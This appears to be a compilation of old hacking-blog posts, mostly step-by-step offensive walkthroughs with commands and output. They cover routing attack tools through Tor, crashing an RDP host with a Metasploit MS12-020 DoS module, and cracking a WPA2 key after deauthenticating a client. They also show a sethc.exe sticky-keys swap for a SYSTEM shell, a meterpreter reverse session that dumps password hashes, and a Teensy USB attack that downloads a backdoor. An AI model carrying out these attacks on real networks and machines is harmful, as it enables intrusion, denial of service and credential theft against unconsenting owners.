Tor & disabling IPv6 in Linux

Install & configure tor / privoxy & proxychains

– Add a new repo

vi /etc/apt/sources.list

deb http://deb.torproject.org/torproject.org lucid main

– Get the key

gpg –keyserver keys.gnupg.net –recv 886DDD89
gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add –

– Installapt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy

– Check privoxy config to make sure listen address is 127.0.0.1:8118 & configure socks4a proxy

vi /etc/privoxy/config

listen-address 127.0.0.1:8118
forward-socks4a / 127.0.0.1:9050 .

– change keep-alive-timeout & socket-timeout to 600

keep-alive-timeout 600
socket-timeout 600

– Start privoxy

/etc/init.d/privoxy start

– Change your browser to point @ your proxy 127.0.0.1:8118
– Check that you connect over tor

https://check.torproject.org/

– Next up, install proxychains so you can use other tools over tor

apt-get install proxychains

– Verify the following line is in /etc/proxychains.conf

socks4 127.0.0.1 9050

– Remove tor & privoxy from startup (init when you need them)

update-rc.d -f tor remove
update-rc.d -f privoxy remove

– Start them up

service tor start
service privoxy start

– Check its working – “proxychains <command>”

root@bt:~# netstat -antp | grep LISTEN
tcp        0      0 127.0.0.1:8118          0.0.0.0:*               LISTEN      3569/privoxy
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      3562/tor

root@bt:~# curl -s icanhazip.com
101.171.255.232

root@bt:~# proxychains curl -s icanhazip.com
|S-chain|-<>-127.0.0.1:9050-<><>-174.132.254.58:80-<><>-OK
31.172.30.1- Have fun, then shut em down when you are done

service privoxy stop
service tor stop

– There are many reasons you may not want IPv6 running on your machine (for example if you were using tor & didnt want IPv6 traffic to go directly to a target instead of via your IPv4 socks proxy)

root@bt:~# vi /etc/sysctl.conf

#disable ipv6
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

root@bt:~# sysctl -p

MS12-020 Metasploit Fun

Metasploit contains a module to DoS Windows hosts with RDP enabled using the PoC code – patched in MS12-020

Well, it works 😀 – short & sweet….

The only known code in the wild is for DoS – so far no remote code execution – but one step generally leads to the other pretty quickly – so disable / patch / protect your RDP ASAP.

Now you see it:

root@bt:~/vpn/darknet# nmap 10.6.6.1 -p 3389

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-25 17:51 EST
Nmap scan report for 10.6.6.1
Host is up (0.0035s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

64 bytes from 10.6.6.1: icmp_seq=99 ttl=127 time=2.90 ms
64 bytes from 10.6.6.1: icmp_seq=100 ttl=127 time=4.13 ms
64 bytes from 10.6.6.1: icmp_seq=101 ttl=127 time=2.85 ms

Now you dont:

root@bt:/opt/metasploit/msf3# ./msfconsole
msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.6.6.1
RHOST => 10.6.6.1
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.6.6.1:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.6.6.1:3389 – 210 bytes sent
[*] 10.6.6.1:3389 – Checking RDP status…
[+] 10.6.6.1:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

From 172.16.0.1 icmp_seq=131 Destination Host Unreachable
From 172.16.0.1 icmp_seq=132 Destination Host Unreachable
From 172.16.0.1 icmp_seq=133 Destination Host Unreachable

w00t BSOD !! – DoS (Crashdump & Reboot)

WPA2 network cracking

So – everyone has cracked WEP & everyone knows it has a couple of seconds security around it.

This time I am getting connected to a WPA2 / PSK protected network.

Couple of things you will need

• Backtrack (I am using 5r1 )
• A wordlist – google is your friend here but there is a 3169 word list at /pentest/passwords/john/password.lst to get you started
• A wireless card
• A WPA or WPA2 network protected with a pre-shared key (your own of course)

==Drop the interface into monitor mode==

root@bt:~# airmon-ng start wlan0

Interface    Chipset        Driver

wlan0        Zydas zd1211    zd1211rw - [phy1]
(monitor mode enabled on mon0)

==Find your target wireless network==

root@bt:~# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 38:E7:D8:AD:B2:0E    0       61        0    0  11  54e  WPA2 CCMP   PSK  Wireless

==Start capturing==

root@bt:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                           

 38:E7:D8:AD:B2:0E    0 100     4319       83    0  11  54e  WPA2 CCMP   PSK  Wireless                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                    

 38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0    1 -48      0       81  Wireless

So now that you are capturing the traffic, we can either wait for a user to connect, or deauth an existing one….

==Deauth an existing user to get the 4 way handshake==

root@bt:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49  Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50  Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@bt:~#

Once the user is connected, you see the WPA handshake in the top right corner

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E    0  96      807       28    0  11  54e  WPA2 CCMP   PSK  Wireless

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0   54 - 6      0      161

Now, the best bit of this over WEP cracking is that we no longer need to be anywhere near the network. The cracking is done offline.

==The easy way (No garuntee this will work)==

There are two ways to tackle this – at the end of the day, you need to brute force the password, but having a decent wordlist gives you a huge advantage over a,b,c,d 1,2,3,4 etc.

This is the secret sauce – without a decent wordlist, you got nothing.

For this example we will just use the one that comes with JTR in BT

root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:00] 48 keys tested (489.60 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 
root@bt:~#

BOOHYA – our WPA2 PSK is sunshine

==The hard way (but will EVENTUALLY find it)==

root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:22] 11484 keys tested (534.50 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 
root@bt:~#

So thats it … no smoke … no mirrors … Get the capture of a handshake, then brute force the key from it 😀

Remember this the next time you are thinking of a PSK for your wireless router.

A good page to read about password strength & get a feel for what it takes to brute force different passwords is the Password Haystacks page by Steve Gibson (grc.com)

60seconds of physical access = p0wn3d windows machine

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Stickey keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, backup the original file and copy in cmd.exe

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 time and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] 172.16.189.137:1029 Request received for /Arf3V...
[*] 172.16.189.137:1029 Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] 172.16.189.137:1030 Request received for /Brf3V...
[*] 172.16.189.137:1030 Stage connection for target rf3V received...
[*] Meterpreter session 2 opened (172.16.189.138:443 -> 172.16.189.137:1030) at 2010-09-27 21:35:10
+1000
[*] Session ID 2 (172.16.189.138:443 -> 172.16.189.137:1030) processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  : 172.16.189.137
Netmask     : 255.255.255.0

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.

PaulDotCom: Archives : Zen and The Art Of An Internal Penetration Testing Program

Ok Ok …. I know im 2 years late to post this as a “new” presentation – but there is some interesting & valuable info in here about pentesting your internal network. Its starts out pretty high level, but is a nice rounded overview on the reasons, methods & tools that you can use to penetration test your network. Hosted by CoreSecurity & presented by Paul Asadoorian from pauldotcom.

Part1:

• Phase I – Target identification
• Phase II – Detect OS & Services
• Phase III – Identify Vulnerabilities

Part2:

• Phase IV – Exploitation
• Phase V – Post-Exploitation
• Phase VI – Reporting

Part 1 has some great grounding information in penetration testing, examples in here for several tools (nmap, nessus, nbtscan etc) and also ways to link them together, eg, run an nmap scan across the network, identifying windows hosts listening on 445, use the nmap scripting engine to determine if they are vulnerable – and use that list of hosts in nessus or metasploit etc.

Part 2 contains more information on why should you exploit a machine, how to exploit etc, using both Metasploit & Core Impact. Some useful info on tasks to perform once you have compromised a host – automated info gathering, looking for sensitive data, gathering screenshots, video, sound recordings etc etc. This segment ends with some good tips on how to report this information to management, then some Q&A.

there is some great info in here, its worth a look.

Part 1:

This webcast is Part I of a two part series I am doing in collaboration with Core Security Technologies. The presentation is full of tips, tricks, process, and practical knowledge about performing penetration testing within your own organization. Whether you are a third-party doing penetration tests or want to penetration test your internal network, this webcast is for you! In Part I I cover such topics as finding rogue access points, processes for creating a successful penetration testing program, identifying targets, and more! Information and resources are below:

via PaulDotCom: Archives.

===OR===

Zen and the Art of an Internal Penetration Testing Program Part I with Paul Asadoorian
Recording date: Wednesday, November 19, 2008 3:00 pm Eastern Standard Time (New York, GMT-05:00)
Panelist Information: Paul Asadoorian of PaulDotCom Security Weekly
Duration: 1 hour 9 minutes
Description:

Please join Core Security and Paul Asadoorian, founder of PaulDotCom Security Weekly, for a live webcast: “Zen and the Art of Maintaining an Internal Penetration Testing Program.”

During this webcast, Asadoorian will offer tips on successfully integrating penetration testing into your vulnerability management program. You’ll learn:

* How to determine if internal penetration testing is right for your organization
* What questions you should ask when planning a pen testing initiative
* How you can best pitch testing to other departments and gain permission from management
* What types of tests to run and how to address the process of dealing with compromised devices
* Which tips and tricks can help you carry out faster, more effective testing

Whether you’re considering rolling out an internal penetration testing program or need a refresher of best practices for your current testing initiatives, this webcast is sure to be time well-spent.

via Core Security: Recorded webcast

Part 2:

During the webcast, Paul Asadoorian of PaulDotCom Security Weekly will discuss best practices for automating your security testing initiatives. You’ll learn tips and tricks for tying vulnerability scanning, penetration testing and reporting into an efficient, repeatable testing process. Paul will demonstrate techniques for vulnerability identification and exploitation, including:

• Importing Nmap data into Nessus
• Using Nessus, and running nessuscmd to automate vulnerability scanning
• Importing results into Metasploit
• Running msfcli to automate penetration testing
• Importing Nmap & Nessus results into CORE IMPACT Pro
• Using Python to script tasks on compromised hosts with CORE IMPACT Pro

You’ll also get answers to questions such as, “How do I integrate password cracking into my testing?” and “What should I do once a host is compromised during a test?”

via Core Security: Recorded webcast

Metasplot and social engineering toolkit SET on iphone4

Having recently (1 week & counting) upgraded my iPhone 3G to a shiny new HTC Desire (more coming on that later), I was quite interested to see that someone has successfully ported metasploit & SET to an iPhone 4 … now to see if it will run on my now spare iPhone 3G ….

Metasploit 3.4 and SET 0.6.1 on iPhone 4

Posted Aug 7 2010 by muts in Offensive Security with 1 Comment

iphone4 msf 03 Metasploit 3.4 and SET 0.6.1 on iPhone 4Metasploit 3.4.2 on the iPhone 4

Just a quick update on getting your favorite tools on iOS 4 – Metasploit and SET. You need to have a Jailbroken iPhone with SSH access for this. You will also need to install nano and APT 0.7 Strict via Cydia. Getting everything up and running is a breeze now. Open a console and type in:

cd /private/var/

apt-get install subversion nano ruby rubygems wget python

apt-get clean

wget http://www.metasploit.com/releases/framework-3.4.1.tar.bz2

tar jxpf framework-3.4.1.tar.bz2

cd msf3

svn update

Remember that everything takes a bit more time on the iPhone, be patient while running msfconsole for the first time. Once that’s done, its a quick path to a shell:

iphone4 msf 02 Metasploit 3.4 and SET 0.6.1 on iPhone 4

via Metasplot and social engineering toolkit SET on iphone4.

Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector | SecManiac.com Blog

hehehe … it was only a matter of time. With devices such as the original yubikey that I have been using being able to be programed to auto launch a website when plugged in, its good to see the idea going to the next level:

Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack VectorPosted by relik @ 8:31 pmThe Teensy devices http://www.prjc.com are Arduino based devices that allow you to utilize onboard memory storage on a microcontroller and emulate a keyboard/mouse. In the Social-Engineer Toolkit SET, gives you the ability to choose Metasploit based payloads and drop a small download stager either through WSCRIPT or through PowerShell to download a backdoor from a remote IP/machine and execute it on the system itself. Why this attack is so useful is that it emulates a keyboard 100 percent, so you can essentially bypass any autorun protections on the system since its a keyboard, not a flash drive or CD/DVD type autorun attack. SET handles the entire creation from a webserver housing the malicious payload, to the actually Metasploit handler.

via Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector | SecManiac.com Blog.

Original credit appears to be going to irongeek from his very detailed original posting – including pictures (we all like pictures) here: Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device